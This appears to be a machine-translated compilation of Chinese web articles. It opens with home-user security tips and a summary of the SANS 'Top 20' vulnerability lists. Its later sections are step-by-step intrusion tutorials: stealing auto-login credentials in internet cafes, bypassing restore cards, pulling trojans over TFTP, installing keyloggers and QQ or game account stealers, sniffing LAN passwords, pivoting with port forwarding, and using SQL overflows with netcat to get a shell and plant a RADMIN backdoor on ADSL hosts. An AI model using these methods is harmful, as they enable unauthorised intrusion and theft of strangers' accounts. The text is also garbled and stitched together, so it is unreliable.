For frequent Internet users, you may find on the Internet need to set a password there are many. Many users of convenience memory, no matter where, all use the same password, does not know that they have unknowingly left a security risk. Because the attacker usually cracked to the user a password, will try to use this password to the user password every need passageway where! Think about it, others slowly with a password to steal your account online; go peep and take fat your E-mail; may also use your identity to damage your image of the chat room; there. .。 Another point is that we set the password, you should not use can be found in the dictionary of words, do not use personal birthday, it is best to letters, symbols, and numbers mixed use special characters such as%, &, #, and $, and within the limits permitted by the longer, the better to ensure that your password is guessed.
4, shielding ActiveX controls. .
Because ActiveX controls can be embedded into an HTML page, and downloaded to the client browser, it will be implemented to the browser-side caused a certain degree of security threats. There is evidence that the client's browser such as IE insert certain ActiveX controls that are directly on the server-side result in unexpected security threats. At the same time, some other technologies, such as embedded in the VB Script language for IE, use this language to generate the client executable of the modules with the same Java applet, it is possible to give the client a security vulnerability in performance. . Therefore, users on the Internet if you want to guarantee that the information is absolutely safe, you can block out the possible threat to computer security ActiveX control by following the steps to: First of all, the menu bar with the mouse to click the "Tools" menu item, and From the drop-down menu, select "Internet Options"; then in the option box select the "Security" tab and click the tab "Custom Level" button; the same time, open the "Security Settings" dialog box to find ActiveX control on the settings, then select "Disable" or "prompt." .
5, periodically clear the cache, history, and the contents of the Temp folder.
We internet browsing information, the browser will browse our online process information stored in the browser-related settings, so next time access the same information can quickly reach the destination, thereby enhancing our browsing efficiency. However, the browser's cache, history, and the contents of the temporary folder to retain our records of many of the Internet, these records, once those people get bored, they may find from these records traces of personal information . In order to ensure the absolute safety of personal information, we should regularly clean up the cache, history and temporary folders content.。.
6, is not at liberty to disclose any personal information. .
Browse for information on the Internet, often find that you need to register your own personal information forms. These sites through programs designed to reach a not fill out the form will not be able to get the information they need. In the face of this forcing the user to register a..
Webmaster Notes: Learn 20 of the most dangerous security vulnerabilities. .
Most successful worms and other cyber attacks rely on are a few common operating system security vulnerabilities exist in. The attackers are opportunist. They use the simplest and most convenient route and use the most effective and widely used tools to find and exploit known vulnerabilities and weaknesses. If the enterprise does not timely patching vulnerabilities that an attacker would have to fly, and they scan the Internet any vulnerable systems, indiscriminate attack. . .
Four years ago, the SANS Institute and the Federal Bureau of investigation (FBI) national infrastructure protection Center (NIPC) published a document that summarizes the "10 most critical Internet security vulnerabilities." Thousands of enterprises attach great importance to this document, and take seriously the problem of vulnerability in the list. In the subsequent three years, they also publish the extension of the "20 most dangerous vulnerabilities" list in the hope that the enterprise can compare their own shortcomings and close the most dangerous security vulnerabilities. . .
SANS this announcement of the "most dangerous" 20 vulnerability list indeed consists of two lists, each containing 10 vulnerability, which correspond to the most often used by Windows to take advantage of the 10 kinds of vulnerabilities and Unix and Linux environments of the 10 most common vulnerabilities. Despite the fact that every year thousands of security incidents affecting these operating systems, but the vast majority of successful attacks are only targeting the 20 vulnerabilities in one or two.
In the Windows vulnerabilities list, topped by a Web server and services, and in the Unix list, the highest in the forefront of the BIND domain name system. Sometimes, each entry represents an extremely broad category. SANS document more than 100 pages, the problem is divided into a number of specific security vulnerabilities and provides detailed tips for users of the problem to be fixed sooner. .
Many vulnerabilities already appears in the list of the last release, but according to the list of research officer Ross Patel said, today's list has some surprising things. Patel pointed out, the file-sharing application, and instant messaging are ranked first in the list of Windows 7-bit and 10-bit, they are relatively new vulnerability category.
Patel said: "The experts have almost unanimously agreed that P2P file sharing and the problem is worth worrying about." And instant messaging, file sharing application is very simple and easy to use, so users tend to ignore them may lead to security problems. .
# 1 Windows Web browser in the list, and the application over the years has always been a very popular topic of security.
Patel said: "For any corner of the world's specialists, Windows in handy for Web browsing device is that most sources of problems, but also the focus of controversies." As Microsoft's IE browser, there is the large number of loopholes, so many Early this year, security experts recommend that users should choose to give up the IE browser, other browsers, but the list of experts is in charge of the reservations on the issue. .
We all know, the "most dangerous" need 20 vulnerability patched immediately. This list is dozens of top security experts on the trail of the results of the study. These experts from the UK, USA and Singapore and other countries most concerned with security issues, government agencies, leading security software vendors and consulting firms, top universities, there are many other user organizations and the SANS Institute. At the end of the document lists the items in the list of all the participants.
Enterprise is no longer a rush. .
Qualys network security enterprise company CTO Gerhard Eschelbeck believes that this year's "most dangerous 20 vulnerability list" is enterprise wide use, and will be considered safety issues the benchmark.
Eschelbeck said: "The industry and academic experts agree that the list are listed some of the most critical vulnerabilities. At present, the weekly number of new vulnerabilities announced reached 50, meaning that there are 2,500 per year vulnerabilities, so if you want to determine which enterprises should be particularly concerned about the vulnerability, it must face great challenges. SANS list can help them them to give priority to those most harmful loopholes.. " .
Alan Paller, Director of the SANS said: "when you request our system to thousands of vulnerability testing, your business will come to a standstill. But the ' 20 most dangerous vulnerabilities ' list you can each year to provide you with a reference to help you work to repair the system most critical vulnerabilities. ”。.
Paller said: "As the scope of the problem is relatively small, so you can put these issues to the system administrator, and give them a few months to solve the problem, it is the only reasonable way.". .
Users can SANS website this list.
Windows system, the most dangerous loopholes. .
1, Web servers, and services.
2, the workstation service. .
3, Windows remote access service.
4, Microsoft SQL Server. .
5, Windows authentication.
6, Web browser. .
7, file sharing applications.
8, LSAS leak. .
9, e-mail client.
10, IM. .
UNIX systems the most dangerous vulnerabilities.
1, BIND Domain Name System. .
2, the Web server.
3, verification. .
4, version control system.
5, the message transmission service. .
6, simple network management protocol (SNMP).
7, Open Secure Sockets Layer (SSL). .
8, NIS/NFS enterprise service error configuration.
9, the database. .
10, kernel.
In the history of the most complete summary of the network protocol (Figure). .
Internet Cafe's invasion.
1. . Cafes invasion. .
Invasion of the Internet's most commonly used method is first of all, the auto login. Now Internet cafes are generally win2000 or windows xp machine, network management is generally the camera set to automatically login! we splash into the system when the login window to Flash when it was over! if we try to put the .exe findfass. login to your account password to find out is not successful because the account password is not in memory and findfass. . In fact both automatic login account password in the registry. We open the registry HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ this directory, AutoAdminLogon this one of the key value to 1, said the automatic landing. 1 time, open the Control Panel's user and password, you will find in front of the hook requires a password has been removed.。 In fact the top sea horse 2006 having a function, the same principle, but because the permission problem, not necessarily read out. In this way, we are looking for an account password. But you know, an Internet cafe for automatic login password account are generally the same, and network management for the convenience of the Internet in general Web bugs they set in the administrator group, at least user group. Know the password for the account is not also worry intrusion? Internet Camera server service is disabled, then we cannot use the ipc's invasion. opentelnet。. . We can use recton with a small useful tool to open telnet, this tool particularly so in win2000 below. After opening a telnet, telnet we go, first in this unit tftpd32. . Exe, and then telnet the following telnet-i myip get 3721. . Exe c: \ 3721. . Exe, so put our Trojan 3721. . Exe such radmin pass passed. Telnet to run again in 3721 directly below. . Exe ok.. .168. .0.192. .1-.168. .255, .0. would you be very pleasantly surprised. We use ms04011 overflow tool overflow, got the system permissions. There is a lot more intrusion method, you can move away scan xscan. Many newbie like Ah D Kit to sweep the Internet bar of an empty password, in fact, this tool scans the user account password is weak, I tried, I used the above first discovered the Internet bar has a blank password for the administrator account, Ah D Kit only scan a few VCL have this account. . Scanner with a fast sweep from 1 to 10,000 ports have not a few minutes. If you find that the server 80 to open the fracture, is not natural is to look at setting up a website. Look website is flawed, try to transfer a asp Trojan up elevated privileges. If you find movie server installed serv_u, and you have an account, you can try serv_u overflow. .
2. Internet cafes in grazing horses.
Trojan in Internet cafes to install the most important thing is to restore its broken, and now Internet cafes are generally three kinds of reduction system, which restored card, restore wizard, freezing restore wizard. Restore the card is actually the so-called hard disk drive protection card is written in the ROM in a HOOK INT 13 process, shielding some function calls such as AH = 3,5, etc., in the INT 13 interrupt vector table in the SEG, OFFSET described as [13h * 4 +2], [13h * 4], this procedure in the first save, then replace with your own code, when you AH = 2 of when it will call the original INT 13 address to complete the (business week) for .As long as the original INT 13 found free entrance. Specific process is as follows: press and hold the F8 key during startup, enter the pure dos environment, the note ";" as a comment. C: prompt, type c:\debug,-a100-xor ax, ax-int 13-int3; look for the original int 13 entrances. Then enter t return to constantly repeat until the displayed address: F000-shaped xxxx, subsequent instruction as: mov dl, 80 (eye-practise. Press q to quit. . Such as I to get the address F000: 9A95 run again debug, type:-e 0:4 c 95 9A 00 F0 e role in the data table "95 9A 00 f0", write the address of 0:4 c starting byte. .-Q Note: When filling carefully, submitted on the wrong words will crash. ok, break to complete. . Then at the prompt c: \ type c: \ win into the windows system you can, then this time you all in the windows system (Business Week) for, with the next start will be restored card stored.。 And win2000 not dos environment, the end of? hehe, I haven't done this dangerous attempt. However there are a lot of looking on crack reduction card tool to download, what tool is best to make everyone his own tests. As regards restoring cards, online password reader, but the tool can only be used under win98. In win2k here we can use winhex to crack, the time the method is very effective, should be the best approach. You just lose a wrong password, the following error window pops up, use winhex to find the main memory, find the Restore Wizard, and then search our start lose the wrong password. . We enter the correct password dump on the line. Here is simple, does not capture it! As for the freezing point reduction, if not break approach, this is indeed very powerful. But he has a option is not restored after restart many times, nothing much you can reboot a try, do not take the whole machine broke down on the line. Restore the equipment after breaking a horse. We'd better install a keylogger or password intercepted Trojans, Pirates of the qq, game accounts, mail accounts and so on. Stuttering and other tools such as password, you can also set the browser default home page for your horse. If the bars are the same as the default home page, and your ability to invade the site, horse hung it in the default home page better! . .
3. NET sniffer.
If you want to know the qq mm bars a number, then you use QQSniffer, Ver2005build5. .5. Can also be used xniffer, used to sniff the local area network or the pop. . Smtp. . Ftp, etc. transmitted in the clear tcp / ip protocol password. Format is xsiff. . Exe-pass-hide-log pass. . Log xsiff. . Exe-tcp-udp-asc-addr 192. .168. .1. .1.。 Simply run on a computer, you can listen to any one of the LAN computer logon account and password, and password display, save, or send to user specified mailboxes. I often have the password sniffer 2. .4 explains the version in the Internet to listen to others and of course Internet password! most appropriate DNS spoofing! as in Figure 3.
4. . Port forwarding. .
In order to be able to control the Internet anytime, anywhere, at home you can also machine! we had a port forwarding. First of all, we can use fport. .exe (this tool in angelshell1. inside the package .0), but uses the format fport can do not need to install a backdoor, you only need to perform normal permissions. Internet Cafe server is generally win2000server Edition, we take note that the administrator does not give him open 3389. If his ip is 192. .0 .1 .168.., and we are at the command line to perform fport. . We re-ip the chicken in the public network run FportClient. . Exe is with a client. A public network like we have landed the 9999 port ip of chicken into the Internet cafe on the host. Above the first film in time to see what will do, not to be found on the line, we move light spots on the line. We can also install the host agent to Internet cafes. The use htran2. .4, SocksCap. Host command line in the Internet cafe to perform htran. . Exe-install (install Socks5 service), htran. . Exe-start (start Socks5 service), then the implementation of "htran..。 In your total net on htran broilers. .exe-s-listen 3389 5200 (listening ports).. now connect using SocksCap. 218. .1 .1 .3.520 port, would be tantamount to entering the Internet host. We can also be used to map the port vidc and fport almost do not more.
How to Hack ADSL. .
1. scan.
Now many ADSL MODEM are three ports by 802,321 to manage, but the 8021 port, many servers are open, not how characteristic, so I chose the 23-port, open my favorite: SUPPERSCAN, fill me area of the IP section, (across multiple paragraphs not matter, anyway SUPPERSCAN speed is fast) short time, the results came out, opened 23 of the host, relatively big ah:) I picked up a few sets out there in the browser Input IP: 218. . Xxx. . Xxx. . Xxx, OK.。.
2. Mapping. .
Intrusion has succeeded by half, to further invasion intranet, we want to make a port mapping, but I can't even in network topology, do not know (not to mention the intranet host ports open) how mapping?, I chose a guess. In General, the MODEM of the default internal network IP is 192.168.1.1, and most of the host's IP set to 192. .1 .2 .168... Therefore we need to do is try to 192.168.1.2 port mapping out there (but if you are using a dhcp is in trouble). . .
3. detection.
Now we further request the SUPPERSCAN 218. xxx. xxx. xxx scan, Oh, that did not? Scan results have been different, open port is 1,391,433 and so on, have just opened the 802,321 it (that is, we have been successful mapping) is the X-SCAN the shot, and use it to sweep the best but weak passwords , but the disappointing results of the scan, a weak and no, it appears the administrator is also not a low B ah. .
4. overflow.
Since there is no weak passwords, nor opening 80, it had to start from the overflow area, but did not open 8021 also webdav. . Sevr-u overflow stand a chance, it is natural, I guide the RPC overflow, but also proved impossible to overflow RPC, LSASS overflow is not OK. .
5. equity so looking back, the Dim light.
It seems that the administrator is more responsible, the patches are marked by fighting, when Hou, my eyes moved to 1433 on the (hey, did not know he played SQL patch does not?) Got it all, now had to die Madang live horse to cure, so nc-v-l 99 sql2 218. . Xxx. . Xxx. . Xxx 0 218. . Xxx. . Xxx. . Xxx 99 bingle successfully get a shell up. .
6. set the back door.
Here, our invasion has been successful, the rest is left off the back door, as the back door, I usually use FTP upload RADMIN up, and Oh, do not go into details here, and we all know. .
